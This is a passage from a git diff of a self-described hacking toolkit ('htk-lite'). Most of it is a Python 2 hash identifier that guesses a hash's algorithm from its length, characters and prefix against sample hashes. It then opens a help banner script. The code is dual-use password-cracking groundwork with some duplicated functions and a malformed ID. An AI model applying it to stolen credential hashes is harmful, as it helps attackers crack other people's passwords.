DomainCachedCredentials(): + hs='f42005ec1afe77967cbc83dce1b4d714' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106025") + def Haval128(): + hs='d6e3ec49aa0f138a619f27609022df10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106160") + def Haval128HMAC(): + hs='3ce8b0ffd75bc240fc7d967729cd6637' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106165") + def MD2(): + hs='08bbef4754d98806c373f2cd7d9a43c4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106060") + def MD2HMAC(): + hs='4b61b72ead2b0eb0fa3b8a56556a6dca' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106120") + def MD4(): + hs='a2acde400e61410e79dacbdfc3413151' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106040") + def MD4HMAC(): + hs='6be20b66f2211fe937294c1c95d1cd4f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106100") + def MD5(): + hs='ae11fd697ec92c7c98de3fac23aba525' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106020") + def MD5HMAC(): + hs='d57e43d2c7e397bf788f66541d6fdef9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106080") + def MD5HMACWordpress(): + hs='3f47886719268dfa83468630948228f6' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106140") + def NTLM(): + hs='cc348bace876ea440a28ddaeb9fd3550' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106029") + def RAdminv2x(): + hs='baea31c728cbf0cd548476aa687add4b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106027") + def RipeMD128(): + hs='4985351cd74aff0abc5a75a0c8a54115' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106180") + def RipeMD128HMAC(): + hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106185") + def SNEFRU128(): + hs='4fb58702b617ac4f7ca87ec77b93da8a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106200") + def SNEFRU128HMAC(): + hs='59b2b9dcc7a9a7d089cecf1b83520350' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106205") + def Tiger128(): + hs='c086184486ec6388ff81ec9f23528727' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106220") + def Tiger128HMAC(): + hs='c87032009e7c4b2ea27eb6f99723454b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106225") + def md5passsalt(): + hs='5634cc3b922578434d6e9342ff5913f7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106240") + def md5saltmd5pass(): + hs='245c5763b95ba42d4b02d44bbcd916f1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106260") + def md5saltpass(): + hs='22cc5ce1a1ef747cd3fa06106c148dfa' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106280") + def md5saltpasssalt(): + hs='469e9cdcaff745460595a7a386c4db0c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106300") + def md5saltpassusername(): + hs='9ae20f88189f6e3a62711608ddb6f5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106320") + def md5saltmd5pass(): + hs='aca2a052962b2564027ee62933d2382f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106340") + def md5saltmd5passsalt(): + hs='de0237dc03a8efdf6552fbe7788b2fdd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106360") + def md5saltmd5passsalt(): + hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106380") + def md5saltmd5saltpass(): + hs='d8f3b3f004d387086aae24326b575b23' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106400") + def md5saltmd5md5passsalt(): + hs='81f181454e23319779b03d74d062b1a2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106420") + def md5username0pass(): + hs='e44a60f8f2106492ae16581c91edb3ba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106440") + def md5usernameLFpass(): + hs='654741780db415732eaee12b1b909119' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106460") + def md5usernamemd5passsalt(): + hs='954ac5505fd1843bbb97d1b2cda0b98f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106480") + def md5md5pass(): + hs='a96103d267d024583d5565436e52dfb3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106500") + def md5md5passsalt(): + hs='5848c73c2482d3c2c7b6af134ed8dd89' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106520") + def md5md5passmd5salt(): + hs='8dc71ef37197b2edba02d48c30217b32' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106540") + def md5md5saltpass(): + hs='9032fabd905e273b9ceb1e124631bd67' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106560") + def md5md5saltmd5pass(): + hs='8966f37dbb4aca377a71a9d3d09cd1ac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106580") + def md5md5usernamepasssalt(): + hs='4319a3befce729b34c3105dbc29d0c40' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106600") + def md5md5md5pass(): + hs='ea086739755920e732d0f4d8c1b6ad8d' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106620") + def md5md5md5md5pass(): + hs='02528c1f2ed8ac7d83fe76f3cf1c133f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106640") + def md5md5md5md5md5pass(): + hs='4548d2c062933dff53928fd4ae427fc0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106660") + def md5sha1pass(): + hs='cb4ebaaedfd536d965c452d9569a6b1e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106680") + def md5sha1md5pass(): + hs='099b8a59795e07c334a696a10c0ebce0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106700") + def md5sha1md5sha1pass(): + hs='06e4af76833da7cc138d90602ef80070' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106720") + def md5strtouppermd5pass(): + hs='519de146f1a658ab5e5e2aa9b7d2eec8' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106740") + + def LineageIIC4(): + hs='0x49a57f66bd3d5ba6abda5579c264a0e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: + jerar.append("107080") + def MD5phpBB3(): + hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: + jerar.append("107040") + def MD5Unix(): + hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: + jerar.append("107060") + def MD5Wordpress(): + hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: + jerar.append("107020") + + def MD5APR(): + hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: + jerar.append("108020") + + def Haval160(): + hs='a106e921284dd69dad06192a4411ec32fce83dbb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109100") + def Haval160HMAC(): + hs='29206f83edc1d6c3f680ff11276ec20642881243' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109200") + def MySQL5(): + hs='9bb2fb57063821c762cc009f7584ddae9da431ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109040") + def MySQL160bit(): + hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: + jerar.append("109060") + def RipeMD160(): + hs='dc65552812c66997ea7320ddfb51f5625d74721b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109120") + def RipeMD160HMAC(): + hs='ca28af47653b4f21e96c1235984cb50229331359' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109180") + def SHA1(): + hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109020") + def SHA1HMAC(): + hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109140") + def SHA1MaNGOS(): + hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109220") + def SHA1MaNGOS2(): + hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109240") + def Tiger160(): + hs='c086184486ec6388ff81ec9f235287270429b225' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109080") + def Tiger160HMAC(): + hs='6603161719da5e56e1866e4f61f79496334e6a10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109160") + def sha1passsalt(): + hs='f006a1863663c21c541c8d600355abfeeaadb5e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109260") + def sha1saltpass(): + hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109280") + def sha1saltmd5pass(): + hs='860465ede0625deebb4fbbedcb0db9dc65faec30' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109300") + def sha1saltmd5passsalt(): + hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109320") + def sha1saltsha1pass(): + hs='58714327f9407097c64032a2fd5bff3a260cb85f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109340") + def sha1saltsha1saltsha1pass(): + hs='cc600a2903130c945aa178396910135cc7f93c63' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109360") + def sha1usernamepass(): + hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109380") + def sha1usernamepasssalt(): + hs='00025111b3c4d0ac1635558ce2393f77e94770c5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109400") + def sha1md5pass(): + hs='fa960056c0dea57de94776d3759fb555a15cae87' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("1094202") + def sha1md5passsalt(): + hs='1dad2b71432d83312e61d25aeb627593295bcc9a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109440") + def sha1md5sha1pass(): + hs='8bceaeed74c17571c15cdb9494e992db3c263695' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109460") + def sha1sha1pass(): + hs='3109b810188fcde0900f9907d2ebcaa10277d10e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109480") + def sha1sha1passsalt(): + hs='780d43fa11693b61875321b6b54905ee488d7760' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109500") + def sha1sha1passsubstrpass03(): + hs='5ed6bc680b59c580db4a38df307bd4621759324e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109520") + def sha1sha1saltpass(): + hs='70506bac605485b4143ca114cbd4a3580d76a413' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109540") + def sha1sha1sha1pass(): + hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109560") + def sha1strtolowerusernamepass(): + hs='79f575543061e158c2da3799f999eb7c95261f07' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109580") + + def Haval192(): + hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110040") + def Haval192HMAC(): + hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110080") + def Tiger192(): + hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110020") + def Tiger192HMAC(): + hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110060") + + def MD5passsaltjoomla1(): + hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("112020") + + def SHA1Django(): + hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: + jerar.append("113020") + + def Haval224(): + hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114040") + def Haval224HMAC(): + hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114080") + def SHA224(): + hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114020") + def SHA224HMAC(): + hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114060") + + def SHA256(): + hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115020") + def SHA256HMAC(): + hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115120") + def Haval256(): + hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115040") + def Haval256HMAC(): + hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115140") + def GOSTR341194(): + hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115060") + def RipeMD256(): + hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115080") + def RipeMD256HMAC(): + hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115160") + def SNEFRU256(): + hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115100") + def SNEFRU256HMAC(): + hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115180") + def SHA256md5pass(): + hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115200") + def SHA256sha1pass(): + hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115220") + + def MD5passsaltjoomla2(): + hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("116020") + def SAM(): + hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: + jerar.append("116040") + + def SHA256Django(): + hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: + jerar.append("117020") + + def RipeMD320(): + hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118020") + def RipeMD320HMAC(): + hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118040") + + def SHA384(): + hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119020") + def SHA384HMAC(): + hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119040") + + def SHA256s(): + hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: + jerar.append("120020") + + def SHA384Django(): + hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: + print " [+] SHA-384(Django)" + jerar.append("121020") + + def SHA512(): + hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122020") + def SHA512HMAC(): + hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122060") + def Whirlpool(): + hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122040") + def WhirlpoolHMAC(): + hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122080") + + + print logo + while True: + jerar=[] + print """ + -------------------------------------------------------------------------""" + hash = raw_input(" HASH: ") + ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() + + if len(jerar)==0: + print "" + print " Not Found." + elif len(jerar)>2: + jerar.sort() + print "" + print "Possible Hashs:" + print "[+] ",algorithms[jerar[0]] + print "[+] ",algorithms[jerar[1]] + print "" + print "Least Possible Hashs:" + for a in range(int(len(jerar))-2): + print "[+] ",algorithms[jerar[a+2]] + else: + jerar.sort() + print "" + print "Possible Hashs:" + for a in range(len(jerar)): + print "[+] ",algorithms[jerar[a]] + +hashid() diff --git a/htk-lite/commandlist/help.py b/htk-lite/commandlist/help.py new file mode 100644 index 0000000..5eda690 --- /dev/null +++ b/htk-lite/commandlist/help.py @@ -0,0 +1,69 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @tuf_unkn0wn +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +import os +import sys +import random +lred = '\033[91m' +lblue = '\033[94m' +lgreen = '\033[92m' +yellow = '\033[93m' +cyan = '\033[1;36m' +purple = '\033[95m' +red = '\033[31m' +green = '\033[32m' +blue = '\033[34m' +orange = '\033[33m' + +colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] +randomcolor = random.choice(colorlist) +banner3list = [red, blue, green, purple] +def helpbanner(): + a = os.popen("ls commandlist -1 | wc -l").read() + b = a.replace('\n', '') + print """ +╔══════════════════════════════════════════════════════════╗ +║ ║ +║ \033[92m ██░ ██ ▓█████ ██▓ ██▓███ \033[0m ║ +║ \033[90m ▓██░ ██▒▓█ ▀ ▓██▒ ▓██░ ██▒ \033[0m ║ +║ \033[92m ▒██▀▀██░▒███ ▒██░ ▓██░ ██▓▒ \033[0m ║ +║ \033[90m ░▓█ ░██ ▒▓█ ▄ ▒██░ ▒██▄█▓▒ ▒ \033[0m ║ +║ \033[92m ░▓█▒░██▓░▒████▒░██████▒▒██▒ ░ ░ \033[0m ║ +║ \033[94m ▒ ░░▒░▒░░ ▒░ ░░ ▒░▓ ░▒▓▒░ ░ ░ \033[0m ║ +║ \033[90m ▒ ░▒░ ░ ░ ░ ░░ ░ ▒ ░░▒ ░ \033[0m ║ +║ \033[94m ░ ░░ ░ ░ ░ ░ ░░ \033[0m ║ +║ \033[90m ░ ░ ░ ░ ░ ░ ░ \033[0m ║ +║ ║ +║══════════════════════════════════════════════════════════║ +║ Commands: [\033[32m{0}\033[0m] Banners: 